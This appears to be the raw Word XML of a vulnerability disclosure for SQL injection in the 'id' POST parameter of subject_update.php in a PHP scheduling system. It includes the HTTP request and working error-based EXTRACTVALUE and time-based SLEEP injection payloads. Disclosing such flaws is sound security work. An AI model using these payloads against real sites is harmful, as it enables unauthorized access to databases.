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-subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_update.php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7D0863F5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/pages/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_update.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564D95F8"/>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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_update.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>' file of the '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>' project. This issue occurs because an attacker injects malicious code from the parameter "id"and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9865" cy="2906395"/>
            <wp:effectExtent l="0" t="0" r="317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69865" cy="2906395"/>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"id"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3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>No login verification required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349D90A9">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Vulnerability details and POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA7D17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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="3F7F5F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>//pages/subject_update.php HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE3EB4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7E5C409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26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C767184">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7B9670BA">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77297EC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3A60017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6361622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5E6556D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2CF1E7F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598306F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//172.20.10.3/scheduling//pages/subject.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DF827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24387B4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1318B47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3F0B7E2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1A760883">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id=&amp;code=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&amp;title=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318E94CD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="3349625"/>
            <wp:effectExtent l="0" t="0" r="14605" b="317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73675" cy="3349625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E0E88C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Vulnerability type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1760730E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>time-based blind</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'id' parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCCDE11">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E65611">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id (POST)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC20AFA">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4577DB67">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AND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(EXTRACTVALUE)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D045EF">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AND EXTRACTVALUE(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>2457</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>,CASE WHEN (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>2457</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2457</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2457</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0x3A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t> END)-- Boaf&amp;code=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&amp;title=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1E662FF4">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75DC179E">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time-based blind  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5522F942">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&gt;= </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12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t> OR time-based blind (query SLEEP)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A70D3F">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id=' OR (SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>9442</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t> FROM (SELECT(SLEEP(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
        </w:rPr>
        <w:t>)))KhQV)-- qjip&amp;code=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&amp;title=</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&amp;save=  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F5ACEB">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2280285"/>
            <wp:effectExtent l="0" t="0" r="3175" b="571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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5269865" cy="2280285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5919CE86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pP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67960" cy="4038600"/>
            <wp:effectExtent l="0" t="0" r="508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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267960" cy="4038600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>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0EE8770"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B0EE877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278060"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D62780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85C513D"/>
    <w:rsid w:val="08C616D3"/>
    <w:rsid w:val="0958078A"/>
    <w:rsid w:val="0AEF0DDC"/>
    <w:rsid w:val="0B4E1B8B"/>
    <w:rsid w:val="0B84410E"/>
    <w:rsid w:val="103D7E98"/>
    <w:rsid w:val="115A162D"/>
    <w:rsid w:val="11652C63"/>
    <w:rsid w:val="1292521C"/>
    <w:rsid w:val="13344EDC"/>
    <w:rsid w:val="13931798"/>
    <w:rsid w:val="13F871E9"/>
    <w:rsid w:val="148443FC"/>
    <w:rsid w:val="15BE1225"/>
    <w:rsid w:val="174E6388"/>
    <w:rsid w:val="191266CD"/>
    <w:rsid w:val="1C511779"/>
    <w:rsid w:val="1F841EC1"/>
    <w:rsid w:val="21494A03"/>
    <w:rsid w:val="21546861"/>
    <w:rsid w:val="21894CDA"/>
    <w:rsid w:val="24B85C79"/>
    <w:rsid w:val="24CA1507"/>
    <w:rsid w:val="2607591B"/>
    <w:rsid w:val="27F2374E"/>
    <w:rsid w:val="28BB402D"/>
    <w:rsid w:val="29711886"/>
    <w:rsid w:val="2B821C11"/>
    <w:rsid w:val="2D214FC0"/>
    <w:rsid w:val="30954A86"/>
    <w:rsid w:val="30BA2637"/>
    <w:rsid w:val="313C778B"/>
    <w:rsid w:val="320457AA"/>
    <w:rsid w:val="330F2F66"/>
    <w:rsid w:val="334A2505"/>
    <w:rsid w:val="34B048AC"/>
    <w:rsid w:val="37E01F7D"/>
    <w:rsid w:val="390078DA"/>
    <w:rsid w:val="3A805D8E"/>
    <w:rsid w:val="3B3A381D"/>
    <w:rsid w:val="3BC268BC"/>
    <w:rsid w:val="3C9E05CE"/>
    <w:rsid w:val="404D5D77"/>
    <w:rsid w:val="43263458"/>
    <w:rsid w:val="439D37F0"/>
    <w:rsid w:val="46190E27"/>
    <w:rsid w:val="46794D72"/>
    <w:rsid w:val="471C535D"/>
    <w:rsid w:val="49125B3D"/>
    <w:rsid w:val="492B154C"/>
    <w:rsid w:val="49961940"/>
    <w:rsid w:val="4AD978D5"/>
    <w:rsid w:val="4DDE00FE"/>
    <w:rsid w:val="4EFF09F2"/>
    <w:rsid w:val="512473D9"/>
    <w:rsid w:val="51BC06EC"/>
    <w:rsid w:val="531D273D"/>
    <w:rsid w:val="549411C4"/>
    <w:rsid w:val="56577DDA"/>
    <w:rsid w:val="569C7080"/>
    <w:rsid w:val="62774F17"/>
    <w:rsid w:val="64D4441E"/>
    <w:rsid w:val="66336607"/>
    <w:rsid w:val="66AF173A"/>
    <w:rsid w:val="68247009"/>
    <w:rsid w:val="69E8167C"/>
    <w:rsid w:val="6E586DB6"/>
    <w:rsid w:val="6E5D131B"/>
    <w:rsid w:val="73BE077C"/>
    <w:rsid w:val="741C3B1A"/>
    <w:rsid w:val="74377C4A"/>
    <w:rsid w:val="745E5F99"/>
    <w:rsid w:val="75BC0E83"/>
    <w:rsid w:val="77925C41"/>
    <w:rsid w:val="7DBC3788"/>
    <w:rsid w:val="7E284A8B"/>
    <w:rsid w:val="7F11162F"/>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458</Words>
  <Characters>3321</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>3789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2024-12-09T06:51:10Z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